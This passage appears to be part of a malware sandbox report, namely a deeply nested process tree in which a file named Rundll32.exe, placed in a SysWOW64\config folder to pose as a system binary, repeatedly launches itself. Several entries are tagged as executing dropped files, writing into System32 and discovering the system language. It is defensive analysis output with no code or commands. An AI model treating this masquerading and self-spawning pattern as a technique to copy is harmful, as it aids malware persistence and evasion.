        "C:\Windows\system32\config\Rundll32.exe"
        37⤵
        Executes dropped EXE
        
        PID:2744
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        38⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4944
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        39⤵
        Executes dropped EXE
        
        PID:2628
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        40⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5692
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        41⤵
        Executes dropped EXE
        
        PID:5052
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        42⤵
        Executes dropped EXE
        
        PID:3480
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        43⤵
        Executes dropped EXE
        
        PID:4144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        44⤵
        Executes dropped EXE
        
        PID:1104
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        45⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2676
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        46⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:848
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        47⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5904
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        48⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:4968
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        49⤵
        Executes dropped EXE
        
        PID:2120
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        50⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        51⤵
        Executes dropped EXE
        
        PID:2404
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        52⤵
        Drops file in System32 directory
        
        PID:4600
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        53⤵
        System Location Discovery: System Language Discovery
        
        PID:1820
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        54⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        55⤵
        Drops file in System32 directory
        
        PID:412
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        56⤵
        Drops file in System32 directory
        
        PID:1036
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        57⤵
        System Location Discovery: System Language Discovery
        
        PID:3584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        58⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        59⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        60⤵
        System Location Discovery: System Language Discovery
        
        PID:3028
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        61⤵
        System Location Discovery: System Language Discovery
        
        PID:4932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        62⤵
        
        PID:2352
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        63⤵
        Drops file in System32 directory
        
        PID:4852
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        64⤵
        Drops file in System32 directory
        
        PID:732
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        65⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        66⤵
        
        PID:4572
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        67⤵
        
        PID:5680
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        68⤵
        Drops file in System32 directory
        
        PID:5016
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        69⤵
        Drops file in System32 directory
        
        PID:5192
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        70⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        71⤵
        Drops file in System32 directory
        
        PID:5652
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        72⤵
        System Location Discovery: System Language Discovery
        
        PID:3380
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        73⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        74⤵
        
        PID:4996
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        75⤵
        
        PID:2160
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        76⤵
        
        PID:1636
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        77⤵
        
        PID:1176
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        78⤵
        System Location Discovery: System Language Discovery
        
        PID:2456
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        79⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        80⤵
        Drops file in System32 directory
        
        PID:2788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        81⤵
        Drops file in System32 directory
        
        PID:1556
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        82⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        83⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        84⤵
        
        PID:2696
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        85⤵
        Drops file in System32 directory
        
        PID:1932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        86⤵
        Drops file in System32 directory
        
        PID:2404
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        87⤵
        Drops file in System32 directory
        
        PID:3772
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        88⤵
        System Location Discovery: System Language Discovery
        
        PID:1820
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        89⤵
        
        PID:2512
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        90⤵
        System Location Discovery: System Language Discovery
        
        PID:2492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        91⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        92⤵
        Drops file in System32 directory
        
        PID:4752
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        93⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        94⤵
        Drops file in System32 directory
        
        PID:4652
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        95⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        96⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        97⤵
        Drops file in System32 directory
        
        PID:5128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        98⤵
        System Location Discovery: System Language Discovery
        
        PID:788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        99⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        100⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        101⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        102⤵
        Drops file in System32 directory
        
        PID:5032
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        103⤵
        
        PID:260
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        104⤵
        
        PID:776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        105⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        106⤵
        System Location Discovery: System Language Discovery
        
        PID:4944
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        107⤵
        System Location Discovery: System Language Discovery
        
        PID:5048
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        108⤵
        Drops file in System32 directory
        
        PID:1156
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        109⤵
        
        PID:1000
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        110⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        111⤵
        
        PID:5512
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        112⤵
        
        PID:1680
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        113⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        114⤵
        
        PID:2004
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        115⤵
        
        PID:5908
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        116⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        117⤵
        
        PID:3588
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        118⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        119⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        120⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        121⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        122⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        123⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        124⤵
        System Location Discovery: System Language Discovery
        
        PID:412
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        125⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        126⤵
        
        PID:228
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        127⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        128⤵
        Drops file in System32 directory
        
        PID:1388
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        129⤵
        Drops file in System32 directory
        
        PID:3700
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        130⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        131⤵
        
        PID:4112
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        132⤵
        
        PID:5576
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        133⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2836
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        134⤵
        
        PID:788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        135⤵
        
        PID:3032
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        136⤵
        
        PID:808
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        137⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        138⤵
        
        PID:4920
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        139⤵
        System Location Discovery: System Language Discovery
        
        PID:3348
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        140⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        141⤵
        
        PID:348
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        142⤵
        System Location Discovery: System Language Discovery
        
        PID:5624
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        143⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:3380
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        144⤵
        
        PID:3128
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        145⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        146⤵
        
        PID:468
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        147⤵
        System Location Discovery: System Language Discovery
        
        PID:4736
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        148⤵
        
        PID:4940
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        149⤵
        Drops file in System32 directory
        
        PID:1804
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        150⤵
        System Location Discovery: System Language Discovery
        
        PID:2456
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        151⤵
        
        PID:2920
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        152⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:5160
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        153⤵
        System Location Discovery: System Language Discovery
        
        PID:2328
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        154⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        155⤵
        Drops file in System32 directory
        
        PID:4372
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        156⤵
        Drops file in System32 directory
        
        PID:3528
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        157⤵
        Drops file in System32 directory
        
        PID:2404
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        158⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        159⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        160⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:2512
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        161⤵
        System Location Discovery: System Language Discovery
        
        PID:440
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        162⤵
        
        PID:4232
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        163⤵
        
        PID:3948
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        164⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        165⤵
        
        PID:4652
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        166⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:4584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        167⤵
        
        PID:1440
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        168⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        169⤵
        System Location Discovery: System Language Discovery
        
        PID:1764
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        170⤵
        Drops file in System32 directory
        
        PID:1648
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        171⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        172⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        173⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        174⤵
        Drops file in System32 directory
        
        PID:1916
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        175⤵
        Drops file in System32 directory
        
        PID:2752
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        176⤵
        Drops file in System32 directory
        
        PID:1552
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        177⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:5420
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        178⤵
        Drops file in System32 directory
        
        PID:3568
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        179⤵
        
        PID:2720
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        180⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:4840
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        181⤵
        System Location Discovery: System Language Discovery
        
        PID:5040
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        182⤵
        
        PID:344
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        183⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:3080
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        184⤵
        Drops file in System32 directory
        
        PID:3480
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        185⤵
        
        PID:5152
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        186⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:5928
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        187⤵
        System Location Discovery: System Language Discovery
        
        PID:4216
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        188⤵
        Drops file in System32 directory
        
        PID:2540
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        189⤵
        
        PID:2788
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        190⤵
        System Location Discovery: System Language Discovery
        
        PID:332
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        191⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        192⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        193⤵
        Drops file in System32 directory
        
        PID:2336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        194⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        195⤵
        Drops file in System32 directory
        
        PID:5584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        196⤵
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        197⤵
        
        PID:3172
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        198⤵
        
        PID:3436
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        199⤵
        System Location Discovery: System Language Discovery
        
        PID:4864
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        200⤵
        Drops file in System32 directory
        
        PID:4148
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        201⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        202⤵
        
        PID:2240
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        203⤵
        
        PID:1072
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        204⤵
        
        PID:5660
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        205⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        206⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        207⤵
        System Location Discovery: System Language Discovery
        
        PID:1292
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        208⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        209⤵
        System Location Discovery: System Language Discovery
        
        PID:3756
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        210⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        211⤵
        System Location Discovery: System Language Discovery
        
        PID:5836
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        212⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        213⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        214⤵
        
        PID:3628
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        215⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        216⤵
        
        PID:2840
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        217⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        218⤵
        
        PID:6024
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        219⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        220⤵
        
        PID:800
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        221⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        222⤵
        
        PID:3776
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        223⤵
        
        PID:1676
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        224⤵
        
        PID:4288
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        225⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        226⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        227⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        228⤵
        
        PID:5756
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        229⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        230⤵
        
        PID:5492
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        231⤵
        
        PID:5584
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        232⤵
        
        PID:932
        
        C:\Windows\SysWOW64\config\Rundll32.exe
        
        "C:\Windows\system32\config\Rundll32.exe"
        233⤵
        
        PID:3172
        
